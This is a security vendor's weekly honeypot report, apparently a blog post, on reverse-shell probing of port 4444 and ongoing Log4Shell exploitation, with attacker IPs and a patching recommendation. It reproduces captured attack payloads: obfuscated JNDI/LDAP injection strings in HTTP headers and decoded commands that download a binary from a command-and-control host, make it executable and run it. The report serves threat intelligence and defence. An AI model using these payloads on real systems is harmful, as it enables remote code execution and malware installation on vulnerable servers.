28 October 2022

CERT, Honeypots

Honeypots: activity of the week 42

For week 42 analysis, TEHTRIS focused on studying two malicious activities monitored on its honeypot network.

Attempts to exploit communication via reverse shell on port 4444

This week, in the TOP 10 of IP addresses launching malicious activities on TEHTRIS honeypots network, we find the two following IP addresses:

212.2.236[.]244 – AS 62164 (Heymman Servers Corporation) – US
23.140.88[.]145 – AS 62164 (Heymman Servers Corporation) – US

These two IP addresses are infamously known from public databases. They have performed 1 275 attempts in one morning on the 19th of October 2022 across Europe but targeted mostly German, Lithuanian and Finnish infrastructures.

They have a specific importance as they requested the following URL:

45.85.219[.]125:4444

It starts a call towards the IP address 45.85.219[.]125 localized in Germany (hosted by AS 44486 SYNLINQ) unknown from public databases using port 4444.

The 4444 port (TCP & UDP) is known for being utilized by Trojans and malwares in general because it is used by the very effective Metasploit reverse shell tool. It is recommended to block incoming traffic towards this port.

Log4shell still actively exploited

Since at least 3 weeks, TEHTRIS observed malicious activities on its honeypots network performed by IP addresses hosted by AS 31898 ORACLE-BMC-31898 in Brazil. For instance, IP address 168.138.252[.]172 launched exploit attempts of SMB protocol.

But the most interesting discovery involved the IP 168.138.128[.]171 which is infamously known from public databases for being the C2 server managing operations to exploit Log4j vulnerabilities.

It is the vulnerability CVE-2021-44228 (CVSS3 : 10), also known as Log4shell, which allows the threat actor to remotely execute a code (RCE). This particularly critical vulnerability concerns Apache Log4j : a software used to manage logs in Java. Log4j is useful to record and collect events happening in applications written in Java. For example, to register all requests sent to a website. The threat actor has the possibility to look for variables and content to display it. The flaw is not directly exploitable, as the threat actor must call a C2 server to download a code.

This Brazilian IP is known from public databases for being requested into the following HTTP Header:

				
					t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}
${env:BARFOO:-l}dap${env:BARFOO:-:}//168.138.128[.]171:1389
/TomcatBypass/Command/Base64
/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3Jpb3Qvb3BlbnZwbjsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3Jpb3Qvb3BlbnZwbjsgY2htb2QgNzc3IG9wZW52cG47IC4vb3BlbnZwbiBydW5uZXI=}')

Or in Base64 Decode:

				
					wget hxxp[://]168[.]138[.]128[.]171/riot/openvpn;
curl -O hxxp[://]168[.]138[.]128[.]171/riot/openvpn;
chmod 777 openvpn; ./openvpn runner)

On TEHTRIS honeypots, here are the whole Headers of the request observed involving this Brazilian C2 IP performed by the Swiss IP address 179.43.139[.]202 (AS 51852 Private Layer INC – infamously known from public databases):

				
					["x-api-version: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')", 
"bearer: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')", 
"x-client-ip: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')", 
'connection: close', 
"cf-connecting_ip: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')", 
'accept: application/json, text/plain, */*', 
"authentication: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')", 
"originating-ip: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')", 
"x-real-ip: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')"]

Here, the attacker tried several ways to exploit the vulnerability.

Here 2 other examples of known requests that try to exploit this CVE :

				
					${jndi:ldap[:]//127.0.0.1[:]389/5j9gclyhuddf8k1712mm0mkwn8kb3h6u/${java:os}/${sys:java.vendor}_${sys:java.version}}

This request performs reconnaissance of the system on which the attack is launched in order to get information regarding the operational system or the version of Java.

				
					${jndi:ldap[:]//168.138.128.171[:]1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}

Or in base64 Decode :

				
					wget http[:]//168.138.128.171/perl/idsha1game; 
curl -O http[:]//168.138.128.171/perl/idsha1game; 
chmod 777 idsha1game; ./idsha1game runner

To go further with the French National Cybersecurity Agency ANSSI : https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-022/

This CVE made a lot of noise since its discovery at the end of 2021 and is still actively exploited one year later.
TEHTRIS recommends that you always apply updates as soon as they become available.

Our latest articles

Subscribe to the TEHTRIS newsletter.

Once a month, get the latest cyber news by subscribing to the TEHTRIS newsletter.

Honeypots: activity of the week 42

Summary

Attempts to exploit communication via reverse shell on port 4444

Log4shell still actively exploited

Our latest articles

Our selection of alerts on honeypots: report 2 – january 2023

XDR SUCCESS USE CASE: blocking advanced cyber-attacks at an early stage

Our selection of alerts on honeypots: report 1 – january 2023

Increase of DDoS attacks

Subscribe to the TEHTRIS newsletter.

Similar publications

XDR SUCCESS USE CASE: blocking advanced cyber-attacks at an early stage

Our selection of alerts on honeypots: report 1 – january 2023

Increase of DDoS attacks

Trend 2023: AI-powered disinformation

TEHTRIS XDR PLATFORM

SIEM

EDR

EPP

MTD

ZTR

NTA

DR

DNS FW